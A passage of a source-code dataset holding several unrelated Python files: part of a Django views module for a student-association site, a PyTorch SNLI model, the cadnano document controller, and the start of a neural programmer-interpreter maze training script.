obligatoire\"\n \n if request.POST.has_key('dateNaissance'):\n if request.POST['dateNaissance'] != \"\":\n user.date_naissance = request.POST['dateNaissance']\n\n if request.POST.has_key('mail') and request.POST['mail'] != \"\":\n if \"@etu.emse.fr\" in request.POST['mail']:\n user.email = request.POST['mail']\n else:\n error['mail'] = \"Veuillez donner votre adresse EMSE\"\n\n if request.POST.has_key('adresse'):\n if request.POST['adresse'] != \"\":\n user.adresse = request.POST['adresse']\n else:\n error['adresse'] = \"L'adresse est obligatoire\"\n\n user.save()\n return error\n\n\n@login_required(login_url=\"/\")\ndef associations_client(request, association_vise=\"\"):\n if association_vise != \"\": \n association_visible = get_object_or_404(Association, pk=association_vise)\n else:\n association_visible = \"\"\n associations = Association.objects.all()\n user_association = []\n user_poste = []\n user = get_object_or_404(Utilisateur, pk=request.user.pk)\n for association in Cotisation.objects.filter(personne=user):\n user_association.append(association.association)\n for poste in association.poste():\n user_poste.append(poste.pk)\n return render(request, 'client/mes_associations.html', locals())\n\n\n@login_required(login_url=\"/\")\ndef paye_cotisation(request):\n user = get_object_or_404(Utilisateur, pk=request.user.pk)\n if request.method == 'POST' and request.POST.has_key(\"choix_asso\"):\n prix_total = 0\n poste_candidat = []\n associations = []\n\n for cotisation in user.cotisation_set.all():\n for poste in Poste.objects.filter(association=cotisation.association):\n if user in poste.candidat.all():\n poste.candidat.remove(user)\n poste.save()\n\n for key, value in request.POST.items():\n print(key + \"\\n\")\n if 'association' in key:\n association = get_object_or_404(Association, pk=value)\n if len(Cotisation.objects.filter(personne = user, association=association)) == 0:\n prix_total += association.prix_cotisation\n associations.append(association)\n elif 'poste' in key:\n poste = get_object_or_404(Poste, pk=value)\n poste_candidat.append(poste)\n if not user in poste.personne.all():\n poste.candidat.add(user)\n poste.save()\n if prix_total > 0:\n return render(request, 'client/paye_cotisation.html', locals())\n else:\n return redirect('client.mes_associations')\n else:\n return redirect('client.mes_associations')\n\n\n@login_required(login_url=\"/\")\ndef mes_evenement(request):\n user = get_object_or_404(Utilisateur, pk=request.user.pk)\n evenements = Evenement.objects.filter(startDate__gt=date.today()).order_by('startDate')\n for event in evenements:\n if event.is_full():\n evenements = evenements.exclude(event)\n return render(request, 'client/mes_evenement.html', locals()) \n\n\n@login_required(login_url=\"/\")\ndef paye_evenement(request):\n user = get_object_or_404(Utilisateur, pk=request.user.pk)\n if request.method == 'POST':\n prix_total_event = 0\n\n for event in Evenement.objects.filter(startDate__gt=date.today()).order_by('association'):\n if user in event.candidat.all():\n event.candidat.remove(user)\n event.save()\n for key, value in request.POST.items():\n if 'event' in key:\n event = get_object_or_404(Evenement, pk=value)\n if not event.is_full() and not user in event.participant.all():\n event.candidat.add(user)\n prix_total_event += event.prix\n event.candidat.add(user)\n event.save()\n if prix_total_event != 0:\n evenements = user.evenement_set.all()\n return render(request, 'client/paye_evenement.html', locals())\n else:\n return 
redirect('client.mes_evenement')\n else:\n return redirect('client.mes_evenement')\n \n\n@login_required(login_url=\"/\")\ndef mes_votes(request):\n user = get_object_or_404(Utilisateur, pk=request.user.pk)\n\n if request.method == \"POST\":\n for key, value in request.POST.items():\n if \"vote_\" in key and value != \"NULL\":\n pk = key.split('_')[1]\n vote = get_object_or_404(Vote, pk=pk)\n reponse = get_object_or_404(Reponse, pk=value)\n if reponse in vote.reponse.all() and user in vote.user():\n reponse.nb_reponse += 1\n vote.user_answered.add(user)\n reponse.save()\n vote.save()\n\n cotisations = Cotisation.objects.filter(personne=user)\n votes = Vote.objects.none()\n votes_finis = Vote.objects.none()\n\n for elt in cotisations:\n votes = votes | elt.association.vote_set.filter(endDate__gt=date.today()-timedelta(1))\n votes_finis = votes_finis | elt.association.vote_set.filter(endDate__lt=date.today()-timedelta(1))\n for vote in elt.association.vote_set.filter(endDate__gt=date.today()-timedelta(1)):\n if not (user in vote.user()) or (user in vote.user_answered.all()):\n votes = votes.exclude(pk=vote.pk)\n\n for vote in elt.association.vote_set.filter(endDate__lt=date.today()):\n if not (user in vote.user()):\n votes_finis = votes.exclude(pk=vote.pk)\n\n votes_finis.order_by('startDate')\n \n return render(request, 'client/mes_votes.html', locals())\n\n\ndef position_to_index(obj):\n \"\"\"\n Return the index related to the object position in the description grid\n :param obj: Define the content of the pointed grid case\n :return: index of the case\n \"\"\"\n position = obj.position\n if position == 'gauche':\n position = 0\n elif position == 'centre':\n position = 1\n else:\n position = 2\n return position\n\n\ndef evenement_description(request, event=\"\"):\n evenement = get_object_or_404(Evenement, pk=event)\n\n row_descriptor_list = [] # Ensemble of description rows\n description = RowDescription.objects.none()\n try:\n description = evenement.row_descriptor.descriptions.all().order_by('position')\n except EvenementDescription.DoesNotExist:\n pass\n\n for row_descriptor in description:\n\n # Collects images and their respective position.\n # Store these images in the row_descriptor_sorted list\n\n # Store the offset of displaying\n disposition_case = row_descriptor.disposition_case\n nombre_element = len(row_descriptor.texts.all()) + len(row_descriptor.images.all())\n if disposition_case == 'centre':\n disposition_case = 1\n elif disposition_case == 'droite':\n if row_descriptor.fusion:\n disposition_case = 1\n else:\n disposition_case = 3 - nombre_element\n else:\n disposition_case = 0\n\n row_descriptor_sorted = ['', '', ''] # Represent a row of the description with it content sorted\n\n # Collect image and text then fill a list with these contents sorted from left to right\n for image in row_descriptor.images.all():\n position = position_to_index(image)\n row_descriptor_sorted[position] = image\n for text in row_descriptor.texts.order_by('pk'):\n position = position_to_index(text)\n row_descriptor_sorted[position] = text\n\n compteur = 0\n for elt in row_descriptor_sorted:\n if elt == \"\":\n compteur += 1\n\n # Store the current description row\n row_descriptor_list.append({\n 'content': list(row_descriptor_sorted),\n 'offset': disposition_case,\n 'fusion': row_descriptor.fusion,\n 'taille_fusion': row_descriptor.nombre_case * 4,\n 'pk_row': row_descriptor.pk\n\n })\n\n print(row_descriptor_list)\n\n return render(request, 'client/descriptionEvent.html', {\n 'evenement': 
evenement,\n 'descriptions': row_descriptor_list,\n })\n\n","sub_path":"Client/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"157625056","text":"from torch.nn import Module\r\nfrom utils.bi_lstm_sequence_model import SequenceEncoderModel\r\nfrom utils.cnn_character_level_model import CharacterCnnEmbed\r\nfrom utils.nn_top_layer_model import TopLayerModel\r\nfrom utils.params import SNLIFullModelParams\r\n\r\n\r\nclass SNLIModel(Module):\r\n def __init__(self, params: SNLIFullModelParams):\r\n super(SNLIModel, self).__init__()\r\n self._chr_embed_model = CharacterCnnEmbed(params.CHARACTER_params) # character embed (CNN)\r\n self._seq_model = SequenceEncoderModel(params.SEQUENSE_premise_params) # premise to vec (LSTM)\r\n # self._hypothesis_seq_model = SequenceEncoderModel(params.SEQUENCE_hypothesis_params)# hypothesis to vec (LSTM)\r\n self._top_layer_model = TopLayerModel(params.TOP_LAYAER_params) # combine with (NN)\r\n self.optimizer = self.set_optimizer(params.LEARNING_RATE, params.OPTIMIZER)\r\n\r\n # init optimizer with RMS_prop\r\n def set_optimizer(self, lr, opt):\r\n return opt(self.parameters(), lr=lr)\r\n\r\n def forward(self, premise_words, premise_chr, hypothesis_words, hypothesis_chr):\r\n premise_v = self._seq_model(premise_words, self._chr_embed_model(premise_chr))\r\n hypothesis_v = self._seq_model(hypothesis_words, self._chr_embed_model(hypothesis_chr))\r\n return self._top_layer_model(premise_v, hypothesis_v)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n import os\r\n from utils.data_loader import SNLIDataset\r\n from utils.params import TRAIN_SRC, PRE_TRAINED_SRC, ChrLevelCnnParams, SequenceEncoderParams, TopLayerParams\r\n from torch.utils.data import DataLoader\r\n\r\n ds = SNLIDataset(os.path.join(\"..\", TRAIN_SRC), os.path.join(\"..\", PRE_TRAINED_SRC))\r\n params = SNLIFullModelParams(ChrLevelCnnParams(chr_vocab_dim=ds.len_chars_vocab),\r\n SequenceEncoderParams(word_vocab_dim=ds.len_words_vocab, pre_trained=ds.word_embed_mx),\r\n SequenceEncoderParams(word_vocab_dim=ds.len_words_vocab, pre_trained=ds.word_embed_mx),\r\n TopLayerParams())\r\n model = SNLIModel(params)\r\n dl = DataLoader(\r\n dataset=ds,\r\n batch_size=64,\r\n collate_fn=ds.collate_fn\r\n )\r\n for i, (p, h, pw, hw, pc, hc, label) in enumerate(dl):\r\n out = model(pw, pc, hw, hc)\r\n e = 0\r\n","sub_path":"utils/snli_full_model.py","file_name":"snli_full_model.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"388059808","text":"# The MIT License\n#\n# Copyright (c) 2011 Wyss Institute at Harvard University\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR 
PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n#\n# http://www.opensource.org/licenses/mit-license.php\n\nimport os.path\nfrom cadnano import app\nfrom model.document import Document\nfrom model.encoder import encode\nfrom model.decoder import decode\nfrom model.enum import StrandType\nfrom model.enum import LatticeType\nfrom views.documentwindow import DocumentWindow\nfrom views.pathview.pathhelixgroup import PathHelixGroup\nfrom views.sliceview.honeycombslicegraphicsitem import HoneycombSliceGraphicsItem\nfrom views.sliceview.squareslicegraphicsitem import SquareSliceGraphicsItem\nfrom views.pathview.handles.activeslicehandle import ActiveSliceHandle\nfrom views import styles\n\nif app().isInMaya():\n from views.solidview.solidhelixgroup import SolidHelixGroup\n\nimport util\n# import Qt stuff into the module namespace with PySide, PyQt4 independence\nutil.qtWrapImport('QtCore', globals(), ['pyqtSignal', 'QString',\n 'QStringList', 'QFileInfo', 'Qt',\n 'QEvent'])\nutil.qtWrapImport('QtGui', globals(), ['QUndoStack', 'QFileDialog',\n 'QAction', 'QApplication',\n 'QMessageBox', 'QKeySequence'])\n\n\nclass DocumentController():\n \"\"\"\n The document controller. Hooks high level (read file/write file, add\n submodel, etc) UI elements to their corresponding actions in the model\n \"\"\"\n def __init__(self, doc=None, fname=None):\n app().documentControllers.add(self)\n if doc != None and doc._undoStack != None:\n self._undoStack = doc._undoStack\n else:\n self._undoStack = QUndoStack()\n self._undoStack.setClean()\n self._undoStack.cleanChanged.connect(\n self.undoStackCleanStatusChangedSlot)\n self._filename = fname if fname else \"untitled.nno\"\n self._activePart = None\n self.sliceGraphicsItem = None\n self.pathHelixGroup = None\n self._hasNoAssociatedFile = fname == None\n self.win = DocumentWindow(docCtrlr=self)\n self.win.closeEvent = self.closer\n self.win.changeEvent = self.changed\n self.connectWindowEventsToSelf()\n self.win.show()\n self._document = None\n self.setDocument(Document() if not doc else doc)\n app().undoGroup.addStack(self.undoStack())\n self.win.setWindowTitle(self.documentTitle() + '[*]')\n #self.solidHelixGrp = None\n if doc != None and doc.parts():\n doc.parts()[0].needsFittingToView.emit()\n\n def closer(self, event):\n if self.maybeSave():\n if app().testRecordMode:\n self.win.sliceController.testRecorder.generateTest()\n event.accept()\n else:\n event.ignore()\n\n def changed(self, event):\n if (event.type() == QEvent.ActivationChange or\n event.type() == QEvent.WindowActivate or\n event.type() == QEvent.ApplicationActivate):\n if self.win.isActiveWindow() and app().activeDocument != self:\n app().activeDocument = self\n if hasattr(self, 'solidHelixGrp'):\n if self.solidHelixGrp:\n self.solidHelixGrp.deleteAllMayaNodes()\n self.solidHelixGrp.onPersistentDataChanged()\n\n def documentTitle(self):\n fname = os.path.basename(str(self.filename()))\n if not self.undoStack().isClean():\n fname += '[*]'\n return fname\n\n def filename(self):\n return self._filename\n\n def setFilename(self, proposedFName):\n if self._filename == proposedFName:\n return True\n self._filename = proposedFName\n self._hasNoAssociatedFile = False\n self.win.setWindowTitle(self.documentTitle())\n return True\n\n def activePart(self):\n if 
self._activePart == None:\n self._activePart = self._document.selectedPart()\n return self._activePart\n\n def setActivePart(self, part):\n # should be document.selectedPart\n self._activePart = part\n\n def document(self):\n return self._document\n\n def setDocument(self, doc):\n self._document = doc\n doc.setController(self)\n doc.partAdded.connect(self.docPartAddedEvent)\n for p in doc.parts():\n self.docPartAddedEvent(p)\n\n def undoStack(self):\n return self._undoStack\n\n def connectWindowEventsToSelf(self):\n \"\"\"Organizational method to collect signal/slot connectors.\"\"\"\n self.win.actionNewHoneycombPart.triggered.connect(self.hcombClicked)\n self.win.actionNewSquarePart.triggered.connect(self.squareClicked)\n self.win.actionNew.triggered.connect(app().newDocument)\n self.win.actionOpen.triggered.connect(self.openClicked)\n self.win.actionClose.triggered.connect(self.closeClicked)\n self.win.actionSave.triggered.connect(self.saveClicked)\n self.win.actionSVG.triggered.connect(self.svgClicked)\n self.win.actionAutoStaple.triggered.connect(self.autoStapleClicked)\n self.win.actionCSV.triggered.connect(self.exportCSV)\n self.win.actionPreferences.triggered.connect(app().prefsClicked)\n self.win.actionSave_As.triggered.connect(self.saveAsClicked)\n # self.win.actionQuit.triggered.connect(self.closeClicked)\n # self.win.actionAdd.triggered.connect(self.addClicked)\n # self.win.actionDelete.triggered.connect(self.deleteClicked)\n # self.win.actionCut.triggered.connect(self.cutClicked)\n # self.win.actionPaste.triggered.connect(self.pasteClicked)\n # self.win.actionMoveUp.triggered.connect(self.moveUpClicked)\n # self.win.actionMoveDown.triggered.connect(self.moveDownClicked)\n # self.win.actionPromote.triggered.connect(self.promoteClicked)\n # self.win.actionDemote.triggered.connect(self.demoteClicked)\n # end def\n\n def undoStackCleanStatusChangedSlot(self):\n self.win.setWindowModified(not self.undoStack().isClean())\n # The title changes to include [*] on modification\n self.win.setWindowTitle(self.documentTitle())\n\n def newClicked(self):\n \"\"\"Create a new document window\"\"\"\n # Will create a new Document object and will be\n # be kept alive by the app's document list\n DocumentController()\n\n def openClicked(self):\n \"\"\"docstring for openClicked\"\"\"\n # self.filesavedialog = None\n # self.openFile('/Users/nick/Downloads/nanorobot.v2.json')\n # return\n if util.isWindows(): # required for native looking file window\n fname = QFileDialog.getOpenFileName(\n None,\n \"Open Document\", \"/\",\n \"CADnano1 / CADnano2 Files (*.nno *.json *.cadnano)\")\n self.filesavedialog = None\n self.openFile(fname)\n else: # access through non-blocking callback\n fdialog = QFileDialog(\n self.win,\n \"Open Document\",\n \"/\",\n \"CADnano1 / CADnano2 Files (*.nno *.json *.cadnano)\")\n fdialog.setAcceptMode(QFileDialog.AcceptOpen)\n fdialog.setWindowFlags(Qt.Sheet)\n fdialog.setWindowModality(Qt.WindowModal)\n # fdialog.exec_() # or .show(), or .open()\n self.filesavedialog = fdialog\n self.filesavedialog.filesSelected.connect(self.openFile)\n fdialog.open() # or .show(), or .open()\n\n def openFile(self, selected):\n if isinstance(selected, QStringList) or isinstance(selected, list):\n fname = selected[0]\n else:\n fname = selected\n if not fname or os.path.isdir(fname):\n return False\n fname = str(fname)\n doc = decode(file(fname).read())\n doc.finalizeImport() # updates staple highlighting\n DocumentController(doc, fname)\n if self.filesavedialog != None:\n 
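# Hedged editor's note: disconnecting the signal before deleting the dialog keeps the
# slot from firing again; the explicit del below works around the PyQt hang on OS X
# mentioned in the original comment.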
self.filesavedialog.filesSelected.disconnect(self.openFile)\n # manual garbage collection to prevent hang (in osx)\n del self.filesavedialog\n # end def\n\n def exportSequenceCSV(self, fname):\n \"\"\"Export all staple sequences to CSV file fnane.\"\"\"\n output = self.activePart().getStapleSequences()\n f = open(fname, 'w')\n f.write(output)\n f.close()\n # end def\n\n def exportCSV(self):\n fname = self.filename()\n if fname == None:\n directory = \".\"\n else:\n directory = QFileInfo(fname).path()\n if util.isWindows(): # required for native looking file window\n fname = QFileDialog.getSaveFileName(\n self.win,\n \"%s - Export As\" % QApplication.applicationName(),\n directory,\n \"(*.csv)\")\n self.filesavedialog = None\n self.exportFile(fname)\n else: # access through non-blocking callback\n fdialog = QFileDialog(\n self.win,\n \"%s - Export As\" % QApplication.applicationName(),\n directory,\n \"(*.csv)\")\n fdialog.setAcceptMode(QFileDialog.AcceptSave)\n fdialog.setWindowFlags(Qt.Sheet)\n fdialog.setWindowModality(Qt.WindowModal)\n # fdialog.exec_() # or .show(), or .open()\n self.filesavedialog = fdialog\n self.filesavedialog.filesSelected.connect(self.exportFile)\n fdialog.open()\n # end def\n\n def exportFile(self, selected):\n if isinstance(selected, QStringList) or isinstance(selected, list):\n fname = selected[0]\n else:\n fname = selected\n if fname.isEmpty() or os.path.isdir(fname):\n return False\n fname = str(fname)\n if not fname.lower().endswith(\".csv\"):\n fname += \".csv\"\n # self.setFilename(fname)\n if self.filesavedialog != None:\n self.filesavedialog.filesSelected.disconnect(self.exportFile)\n # manual garbage collection to prevent hang (in osx)\n del self.filesavedialog\n return self.exportSequenceCSV(fname)\n # end def\n\n def closeClicked(self):\n \"\"\"This will trigger a Window closeEvent\"\"\"\n if util.isWindows():\n self.win.close()\n\n def maybeSave(self):\n \"\"\"\n Save on quit, check if document changes have occured.\n \"\"\"\n if app().dontAskAndJustDiscardUnsavedChanges:\n return True\n if not self.undoStack().isClean(): # document dirty?\n savebox = QMessageBox(QMessageBox.Warning, \"Application\",\n \"The document has been modified.\\nDo you want to save your changes?\",\n QMessageBox.Save | QMessageBox.Discard | QMessageBox.Cancel,\n self.win,\n Qt.Dialog | Qt.MSWindowsFixedSizeDialogHint | Qt.Sheet)\n savebox.setWindowModality(Qt.WindowModal)\n save = savebox.button(QMessageBox.Save)\n discard = savebox.button(QMessageBox.Discard)\n cancel = savebox.button(QMessageBox.Cancel)\n save.setShortcut(\"Ctrl+S\")\n discard.setShortcut(QKeySequence(\"D,Ctrl+D\"))\n cancel.setShortcut(QKeySequence(\"C,Ctrl+C,.,Ctrl+.\"))\n ret = savebox.exec_()\n del savebox # manual garbage collection to prevent hang (in osx)\n if ret == QMessageBox.Save:\n return self.saveAsClicked()\n elif ret == QMessageBox.Cancel:\n return False\n return True\n\n def writeToFile(self, filename=None):\n if filename == None:\n assert(not self._hasNoAssociatedFile)\n filename = self.filename()\n try:\n f = open(filename, 'w')\n encode(self._document, f)\n f.close()\n except IOError:\n flags = Qt.Dialog | Qt.MSWindowsFixedSizeDialogHint | Qt.Sheet\n errorbox = QMessageBox(QMessageBox.Critical,\n \"CaDNAno\",\n \"Could not write to '%s'.\" % filename,\n QMessageBox.Ok,\n self.win,\n flags)\n errorbox.setWindowModality(Qt.WindowModal)\n errorbox.open()\n return False\n self.undoStack().setClean()\n self.setFilename(filename)\n return True\n\n def saveClicked(self):\n if 
self._hasNoAssociatedFile or self._document._importedFromJson:\n self.openSaveFileDialog()\n return\n self.writeToFile()\n\n def saveAsClicked(self):\n self.openSaveFileDialog()\n\n def openSaveFileDialog(self):\n fname = self.filename()\n if fname == None:\n directory = \".\"\n else:\n directory = QFileInfo(fname).path()\n if util.isWindows(): # required for native looking file window\n fname = QFileDialog.getSaveFileName(\n self.win,\n \"%s - Save As\" % QApplication.applicationName(),\n directory,\n \"%s (*.nno)\" % QApplication.applicationName())\n self.writeToFile(fname)\n else: # access through non-blocking callback\n fdialog = QFileDialog(\n self.win,\n \"%s - Save As\" % QApplication.applicationName(),\n directory,\n \"%s (*.nno)\" % QApplication.applicationName())\n fdialog.setAcceptMode(QFileDialog.AcceptSave)\n fdialog.setWindowFlags(Qt.Sheet)\n fdialog.setWindowModality(Qt.WindowModal)\n # fdialog.exec_() # or .show(), or .open()\n self.filesavedialog = fdialog\n self.filesavedialog.filesSelected.connect(\n self.saveFileDialogCallback)\n fdialog.open()\n\n def saveFileDialogCallback(self, selected):\n if isinstance(selected, QStringList) or isinstance(selected, list):\n fname = selected[0]\n else:\n fname = selected\n if fname.isEmpty() or os.path.isdir(fname):\n return False\n fname = str(fname)\n if not fname.lower().endswith(\".nno\"):\n fname += \".nno\"\n if self.filesavedialog != None:\n self.filesavedialog.filesSelected.disconnect(\n self.saveFileDialogCallback)\n del self.filesavedialog # prevents hang\n self.writeToFile(fname)\n # end def\n\n def svgClicked(self):\n if isinstance(selected, QStringList) or isinstance(selected, list):\n fname = selected[0]\n else:\n fname = selected\n if fname.isEmpty() or os.path.isdir(fname):\n return False\n fname = str(fname)\n if not fname.lower().endswith(\".svg\"):\n fname += \".svg\"\n self.setFilename(fname)\n if self.filesavedialog != None:\n self.filesavedialog.filesSelected.disconnect(self.saveFile)\n del self.filesavedialog\n return self.svgClicked()\n # end def\n\n def hcombClicked(self):\n \"\"\"docstring for hcombClicked\"\"\"\n self.addHoneycombHelixGroup()\n # end def\n\n def squareClicked(self):\n \"\"\"docstring for squareClicked\"\"\"\n self.addSquareHelixGroup()\n # end def\n\n def autoStapleClicked(self):\n self.activePart().autoStaple()\n\n ############# Spawning / Destroying HoneycombSliceGraphicsItems ##########\n ##################### and PathHelixGroups for Parts ######################\n def docPartAddedEvent(self, part):\n if part.crossSectionType() == LatticeType.Honeycomb:\n self.sliceGraphicsItem = HoneycombSliceGraphicsItem(part,\n controller=self.win.sliceController,\n parent=self.win.sliceroot)\n else:\n self.sliceGraphicsItem = SquareSliceGraphicsItem(part,\n controller=self.win.sliceController,\n parent=self.win.sliceroot)\n self.pathHelixGroup = PathHelixGroup(part,\n controller=self.win.pathController,\n parent=self.win.pathroot)\n\n if app().isInMaya():\n self.solidHelixGrp = SolidHelixGroup(\n part,\n controller=self.win.pathController,\n htype=part.crossSectionType())\n\n self.win.sliceController.activeSliceLastSignal.connect(\n self.pathHelixGroup.activeSliceHandle().moveToLastSlice)\n self.win.sliceController.activeSliceFirstSignal.connect(\n self.pathHelixGroup.activeSliceHandle().moveToFirstSlice)\n self.win.pathController.setActivePath(self.pathHelixGroup)\n self.win.actionFrame.triggered.connect(self.pathHelixGroup.zoomToFit)\n\n for vh in part.getVirtualHelices():\n xos = 
vh.get3PrimeXovers(StrandType.Scaffold)\n for xo in xos:\n toBase = (xo[1][0], xo[1][2])\n self.pathHelixGroup.createXoverItem(\n xo[0], toBase, StrandType.Scaffold)\n xos = vh.get3PrimeXovers(StrandType.Staple)\n for xo in xos:\n toBase = (xo[1][0], xo[1][2])\n self.pathHelixGroup.createXoverItem(\n xo[0], toBase, StrandType.Staple)\n # end for\n self.setActivePart(part)\n\n # end def\n\n def addHoneycombHelixGroup(self):\n \"\"\"Adds a honeycomb DNA part to the document. Dimensions are set by\n the Document addDnaHoneycombPart method.\"\"\"\n dnaPart = self._document.addDnaHoneycombPart()\n self.setActivePart(dnaPart)\n if app().testRecordMode:\n self.win.sliceController.testRecorder.setPart(\n dnaPart.crossSectionType())\n # end def\n\n def addSquareHelixGroup(self):\n \"\"\"Adds a square DNA part to the document. Dimensions are set by\n the Document addDnaSquarePart method.\"\"\"\n dnaPart = self._document.addDnaSquarePart()\n self.setActivePart(dnaPart)\n if app().testRecordMode:\n self.win.sliceController.testRecorder.setPart(\n dnaPart.crossSectionType())\n # end def\n\n def createAction(self, icon, text, parent, shortcutkey):\n \"\"\"\n returns a QAction object\n \"\"\"\n action = QAction(QIcon(icon), text, parent)\n if not shortcutkey.isEmpty():\n action.setShortcut(shortcutkey)\n return action\n# end class\n","sub_path":"controllers/documentcontroller.py","file_name":"documentcontroller.py","file_ext":"py","file_size_in_byte":20203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"96794069","text":"from __future__ import print_function\nimport argparse\nimport os\nimport torch\nimport numpy as np\nfrom Model.npi import NPI\nfrom Model.maze_core import MazeCore\nimport pickle\nfrom Env.maze import Maze_Env, CONFIG\nimport time\nfrom tensorboardX import SummaryWriter\nimport random\n\ntrain_n_iter = 0\nsame_n_iter = 0\ndiff_n_iter = 0\n\ndef run_epoch(npi, mode, cur_data, writer):\n random.shuffle(cur_data)\n global train_n_iter\n global same_n_iter\n global diff_n_iter\n\n if mode != 'train':\n npi.eval()\n else:\n npi.train()\n\n epoch_def_loss = 0.0\n epoch_total_loss = 0.0\n epoch_pro_accs = 0.0\n epoch_ter_accs = 0.0\n epoch_step = 0\n start_time = time.time()\n for maze_idx in range(len(cur_data)):\n start, end, maze, trace = cur_data[maze_idx]\n\n maze_env = Maze_Env(start, end, maze)\n\n x, y = trace[:-1], trace[1:]\n npi.reset_state(1)\n # step_def_loss, step_arg_loss, term_acc, prog_acc, = 0.0, 0.0, 0.0, 0.0\n # arg0_acc, arg1_acc, arg2_acc, num_args = 0.0, 0.0, 0.0, 0\n step_def_loss = 0.0\n step_total_loss = 0.0\n pro_accs = 0.0\n ter_accs = 0.0\n\n for trace_idx in range(len(x)):\n (pro_in_name, pro_in_id), arg_in, ter_in = x[trace_idx]\n (pro_out_name, pro_out_id), arg_out, ter_out = y[trace_idx]\n\n maze_env.execute(pro_in_id, arg_in)\n env_ft = maze_env.encode_env()\n env_ft = torch.from_numpy(env_ft).view(1, -1)\n\n arg_in_ft = maze_env.encode_args(arg_in)\n arg_in_ft = torch.from_numpy(arg_in_ft).view(1, -1)\n arg_out_ft = maze_env.encode_args(arg_out)\n arg_out_ft = torch.from_numpy(arg_out_ft).view(1, -1)\n\n pro_in_ft = np.array([pro_in_id])\n pro_in_ft = torch.from_numpy(pro_in_ft).view(1, -1)\n pro_out_ft = np.array([pro_out_id])\n pro_out_ft = torch.from_numpy(pro_out_ft).view(-1)\n\n ter_out_ft = [1] if ter_out else [0]\n ter_out_ft = np.array(ter_out_ft)\n ter_out_ft = torch.from_numpy(ter_out_ft).view(-1)\n\n if cuda_flag:\n env_ft = env_ft.cuda()\n arg_in_ft = arg_in_ft.cuda()\n arg_out_ft = 
arg_out_ft.cuda()\n pro_in_ft = pro_in_ft.cuda()\n pro_out_ft = pro_out_ft.cuda()\n ter_out_ft = ter_out_ft.cuda()\n\n pro_pred, arg_pred, ter_pred = npi(env_ft, arg_in_ft, pro_in_ft)\n pred = (pro_pred, arg_pred, ter_pred)\n gt = (pro_out_ft, arg_out_ft, ter_out_ft)\n default_loss, total_loss = npi.cal_loss(pred, gt)\n\n pro_acc, ter_acc = npi.cal_metrics(pred, gt)\n pro_accs += pro_acc\n ter_accs += ter_acc\n\n if mode == 'train':\n # arg is not blank\n if pro_out_id == 0 or pro_out_id == 3 \\\n or pro_out_id == 4 or pro_out_id == 7:\n optimizer.zero_grad()\n total_loss.backward(retain_graph=True)\n optimizer.step()\n else: # ter_loss and pro_loss\n optimizer.zero_grad()\n default_loss.backward(retain_graph=True)\n optimizer.step()\n\n step_def_loss += default_loss.item()\n step_total_loss += total_loss.item()\n\n if maze_idx % 10 == 0:\n print(\"Epoch {0:02d} Maze idx {1:03d} Default Step Loss {2:05f}, \" \\\n \"Total Step Loss {3:05f}, Term Acc: {4:03f}, Prog Acc: {5:03f}\" \\\n .format(curr_epoch, maze_idx, step_def_loss / len(x), step_total_loss / len(x), ter_accs / len(x),\n pro_accs / len(x)))\n\n if mode == 'train':\n writer.add_scalar(mode + '/def_loss', step_def_loss / len(x), train_n_iter)\n writer.add_scalar(mode + '/total_loss', step_total_loss / len(x), train_n_iter)\n writer.add_scalar(mode + '/pro_accs', pro_accs / len(x), train_n_iter)\n writer.add_scalar(mode + '/ter_accs', ter_accs / len(x), train_n_iter)\n train_n_iter += 1\n elif mode == 'test_same':\n writer.add_scalar(mode + '/def_loss', step_def_loss / len(x), same_n_iter)\n writer.add_scalar(mode + '/total_loss', step_total_loss / len(x), same_n_iter)\n writer.add_scalar(mode + '/pro_accs', pro_accs / len(x), same_n_iter)\n writer.add_scalar(mode + '/ter_accs', ter_accs / len(x), same_n_iter)\n same_n_iter += 1\n elif mode == 'test_dif':\n writer.add_scalar(mode + '/def_loss', step_def_loss / len(x), diff_n_iter)\n writer.add_scalar(mode + '/total_loss', step_total_loss / len(x), diff_n_iter)\n writer.add_scalar(mode + '/pro_accs', pro_accs / len(x), diff_n_iter)\n writer.add_scalar(mode + '/ter_accs', ter_accs / len(x), diff_n_iter)\n diff_n_iter += 1\n\n epoch_def_loss += step_def_loss\n epoch_total_loss += step_total_loss\n epoch_pro_accs += pro_accs\n epoch_ter_accs += ter_accs\n epoch_step += len(x)\n\n end_time = time.time()\n epoch_time = end_time - start_time\n print(\"Mode: {0:s} For whole Epoch {1:02d}, Time Consum {2:05f} Default Step Loss {3:05f}, \" \\\n \"Total Step Loss {4:05f}, Term Acc: {5:03f}, Prog Acc: {6:03f}\"\n .format(mode, curr_epoch, epoch_time, epoch_def_loss / epoch_step,\n epoch_total_loss / epoch_step, epoch_ter_accs / epoch_step,\n epoch_pro_accs / epoch_step))\n print('===============================')\n return (epoch_def_loss / epoch_step, epoch_total_loss / epoch_step,\n epoch_ter_accs / epoch_step, epoch_pro_accs / epoch_step)\n\ndef print_net(network):\n print('---------- Networks initialized -------------')\n num_params = 0\n for param in network.parameters():\n num_params += param.numel()\n print(network)\n print('NPI: Total number of parameters : %.3f M' % (num_params / 1e6))\n print('-----------------------------------------------')\n\nif __name__ == \"__main__\":\n start_epoch = 1\n max_num_epochs = 20\n exp_dir = os.path.join('tfboard', 